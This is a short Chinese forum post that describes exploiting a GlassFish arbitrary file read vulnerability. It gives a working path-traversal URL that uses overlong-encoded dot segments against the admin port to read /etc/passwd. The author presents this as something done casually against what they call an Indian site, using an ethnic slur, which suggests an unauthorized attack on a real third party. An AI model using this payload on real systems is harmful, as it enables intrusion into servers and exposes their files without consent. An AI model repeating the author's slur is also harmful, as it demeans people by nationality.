glassfish任意文件读取

lzmghk   ·   发表于 2021-06-22 18:26:10   ·   漏洞文章

闲来无事,点开GOOGle浏览器X-Powered-By 看到WEB中间件glassfish server

百度走一波,发现glassfish任意文件读取

先试一下windows读取文件没反应,再试一下linux


利用代码https://1.1.1.1:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
这个域名是印度阿三的

用户名金币积分时间理由
Track-聂风 30.00 0 2021-06-23 14:02:51 加油哦

打赏我,让我更有动力~

0 条回复   |  直到 2021-6-22 | 942 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.